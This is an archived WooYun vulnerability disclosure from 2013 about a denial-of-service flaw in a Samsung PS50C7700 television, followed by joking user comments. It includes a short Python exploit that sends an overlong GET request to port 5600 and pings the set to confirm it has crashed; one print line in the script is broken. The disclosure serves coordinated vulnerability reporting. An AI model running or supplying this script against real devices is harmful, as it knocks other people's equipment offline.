当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034780

漏洞标题:让三星电视拒绝服务(附测试exp)

相关厂商:三星

漏洞作者: 0ctf

提交时间:2013-08-20 07:46

修复时间:2013-11-18 07:47

公开时间:2013-11-18 07:47

漏洞类型:拒绝服务

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-08-20: 细节已通知厂商并且等待厂商处理中
2013-08-21: 厂商已经确认,细节仅向厂商公开
2013-08-24: 细节向第三方安全合作伙伴开放
2013-10-15: 细节向核心白帽子及相关领域专家公开
2013-10-25: 细节向普通白帽子公开
2013-11-04: 细节向实习白帽子公开
2013-11-18: 细节向公众公开

简要描述:

成功让我的三星PS50C7700电视崩坏!

详细说明:

用电脑对目标电视端口TCP/5600 Web服务器(DMCRUIS/0.1),发送一个长期的HTTP GET请求使目标电视拒绝服务

漏洞证明:

附测试exp,py源代码

#!/usr/bin/python
 
  
import httplib
import sys
import os
 
print "  ***************************************************************************************"
print "  #三星PS50C7700 test"
***************************************************************************************\n"
 
# Sends the payload
print "  Sending the malicious payload...\n"
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()
 
# Checks the response
print "  Checking the status... (CTRL+Z to stop)\n"
response = 0
while response == 0:
  response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
  if response != 0:
    print "  Target down!\n"

修复方案:

版权声明:转载请注明来源 0ctf@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-08-21 18:42

厂商回复:

谢谢提出的漏洞,我们将尽快进行修复。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-08-20 08:27 | 有妹子送上 ( 实习白帽子 | Rank:89 漏洞数:28 | 杭州最帅的男人)

    爆炸了

  2. 2013-08-20 08:42 | 78基佬 ( 实习白帽子 | Rank:84 漏洞数:20 | 不会日站的设计师不是好产品经理)

    剧透一下,遥控器往电视上一扔它就坏了 就拒绝服务了

  3. 2013-08-20 08:56 | Hxai11 ( 普通白帽子 | Rank:1137 漏洞数:218 | 于是我们奋力向前游,逆流而上的小舟,不停...)

    那个不是国外已经有先例了吗,这个不算抄袭?

  4. 2013-08-20 09:44 | 一只猿 ( 普通白帽子 | Rank:463 漏洞数:89 | 硬件与无线通信研究方向)

    一锤子上去就行了

  5. 2013-08-20 09:48 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名,可我没猜出密码。)

    exp我就不要了,电视可以来一台。。。

  6. 2013-08-20 09:56 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    挺好玩的,下次测试一下,好像是向电视机的5600端口发出一个超长的GET请求

  7. 2013-08-20 10:02 | n0bele ( 普通白帽子 | Rank:220 漏洞数:45 | 无耻最寂寞)

    很好,有没有搞硬件hack的群?起搏器、ATM、车载系统、磁卡机等等,打算学习一下.

  8. 2013-08-20 10:24 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    @n0bele 搞完你就挂了、、、

  9. 2013-08-20 10:31 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    @n0bele 然后你就会像blackhat那位大黑阔一样

  10. 2013-08-20 11:00 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    这也可以

  11. 2013-08-20 11:43 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    砖头拒绝服务

  12. 2013-08-20 16:09 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    我家的LG也可以去看下 的确开放了端口和服务了

  13. 2013-08-21 19:31 | phith0n 认证白帽子 ( 核心白帽子 | Rank:656 漏洞数:107 | 一个想当文人的黑客~)

    拒绝服务只要一板砖。

  14. 2013-09-30 22:35 | c2c2 ( 路人 | Rank:4 漏洞数:4 )

    这也可以

  15. 2013-10-01 21:23 | ACGT ( 实习白帽子 | Rank:32 漏洞数:4 | another script kiddie)

    DoS都是攻击别人设备的,第一次见攻击自己的设备的。。

  16. 2013-10-08 08:59 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    电视还能用吗?

  17. 2013-10-25 08:35 | 雷锋小号 ( 路人 | 还没有发布任何漏洞 | 乌云现在就缺我这种默默顶贴从来不求脸熟的...)

    黑白电视机路过

  18. 2013-11-18 16:50 | iam10ng ( 路人 | Rank:4 漏洞数:1 | 这家伙好懒)

    去按开关就拒绝服务了

  19. 2013-11-18 21:12 | ____Smile ( 路人 | Rank:6 漏洞数:6 | 霜满天 谁明雨透骨寒云山巅 谁抚燕惊虹...)

    一锤子就搞定了,还用那么麻烦么?我说的对不?

  20. 2013-11-18 22:53 | 想要减肥的胖纸 ( 普通白帽子 | Rank:250 漏洞数:42 )

    我X 你应该用gdb 调试下 看看是不是溢出。没准可以写个exploit 反弹shell。没准还能越狱。各种x

  21. 2013-11-19 16:29 | 孤独男孩 ( 路人 | Rank:8 漏洞数:5 | 专注网络信息安全,漏洞发掘,代码审核,云...)

    强啊,我真想不明白这些怎么研究的

  22. 2014-04-18 11:04 | evil_webshell ( 路人 | Rank:0 漏洞数:2 | 致力于web层面的安全,热爱黑客技术,正在...)

    看了看确实不错很不错的感觉哈哈

  23. 2014-12-23 21:16 | 萌萌哒-花粉 ( 路人 | Rank:4 漏洞数:5 | 多乌云 多美女 花粉 顾名思义 就是校花班花...)

    端口都没开放 难道修复了?今晚琢磨下

  24. 2014-12-23 22:10 | 萌萌哒-花粉 ( 路人 | Rank:4 漏洞数:5 | 多乌云 多美女 花粉 顾名思义 就是校花班花...)

    @孤独男孩 手机APP调用端口吧